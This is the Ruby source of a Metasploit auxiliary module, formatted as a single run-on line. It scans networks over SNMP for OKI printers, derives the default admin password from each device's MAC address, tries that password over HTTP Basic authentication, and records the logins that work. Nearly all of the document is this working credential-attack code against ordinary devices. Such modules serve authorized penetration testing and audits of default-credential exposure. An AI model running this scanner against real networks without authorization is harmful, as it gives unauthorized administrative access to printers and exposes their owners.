OKI Printer Default Login Credential Scanner

### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework### TODO: Split this module into two separate SNMP and HTTP modules.class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::SNMPClient  include Msf::Auxiliary::Scanner  include Msf::Auxiliary::Report  def initialize(info={})    super(update_info(info,      'Name'          => 'OKI Printer Default Login Credential Scanner',      'Description'   => %q{        This module scans for OKI printers via SNMP, then tries to connect to found devices        with vendor default administrator credentials via HTTP authentication. By default, OKI        network printers use the last six digits of the MAC as admin password.      },      'Author'        => 'antr6X <anthr6x[at]gmail.com>',      'License'       => MSF_LICENSE    ))    register_options(      [        OptPort.new('SNMPPORT', [true, 'The SNMP Port', 161]),        OptPort.new('HTTPPORT', [true, 'The HTTP Port', 80])      ])    deregister_options('RPORT', 'VHOST')  end  def cleanup    datastore['RPORT'] = @org_rport  end  def report_cred(opts)    service_data = {      address: opts[:ip],      port: opts[:port],      service_name: opts[:service_name],      protocol: 'tcp',      workspace_id: myworkspace_id    }    credential_data = {      origin_type: :service,      module_fullname: fullname,      username: opts[:user],      private_data: opts[:password],      private_type: :password    }.merge(service_data)    login_data = {      last_attempted_at: Time.now,      core: create_credential(credential_data),      status: Metasploit::Model::Login::Status::SUCCESSFUL,      proof: opts[:proof]    }.merge(service_data)    create_credential_login(login_data)  end  def run_host(ip)    @org_rport = datastore['RPORT']    datastore['RPORT'] = datastore['SNMPPORT']    index_page = "index_ad.htm"    auth_req_page = "status_toc_ad.htm"    snmp = connect_snmp()    snmp.walk("1.3.6.1.2.1.2.2.1.6") do |mac|      last_six  = mac.value.unpack("H2H2H2H2H2H2").join[-6,6].upcase      first_six = mac.value.unpack("H2H2H2H2H2H2").join[0,6].upcase      # check if it is a OKI      # OUI list can be found at http://standards.ieee.org/develop/regauth/oui/oui.txt      if first_six ==  "002536" || first_six == "008087" || first_six == "002536"        sys_name = snmp.get_value('1.3.6.1.2.1.1.5.0').to_s        print_status("Found: #{sys_name}")        print_status("Trying credential: admin/#{last_six}")        tcp = Rex::Socket::Tcp.create(          'PeerHost' => rhost,          'PeerPort' => datastore['HTTPPORT'],          'Context' =>            {              'Msf'=>framework,              'MsfExploit'=>self            }        )        auth = Rex::Text.encode_base64("admin:#{last_six}")        http_data = "GET /#{auth_req_page} HTTP/1.1\r\n"        http_data << "Referer: http://#{ip}/#{index_page}\r\n"        http_data << "Authorization: Basic #{auth}\r\n\r\n"        tcp.put(http_data)        data = tcp.recv(12)        response = "#{data[9..11]}"        case response        when "200"          print_good("#{rhost}:#{datastore['HTTPPORT']} logged in as: admin/#{last_six}")          report_cred(            ip: rhost,            port: datastore['HTTPPORT'],            service_name: 'http',            user: 'admin',            password: last_six,            proof: response.inspect          )        when "401"          print_error("Default credentials failed")        when "404"          print_status("Page not found, try credential manually: admin/#{last_six}")        else          print_status("Unexpected message")        end        disconnect()      end    end    # No need to make noise about timeouts    rescue ::Rex::ConnectionError, ::SNMP::RequestTimeout, ::SNMP::UnsupportedVersion    rescue ::Interrupt      raise $!    rescue ::Exception => e      print_error("#{ip} Error: #{e.class} #{e} #{e.backtrace}")    ensure      disconnect_snmp    endend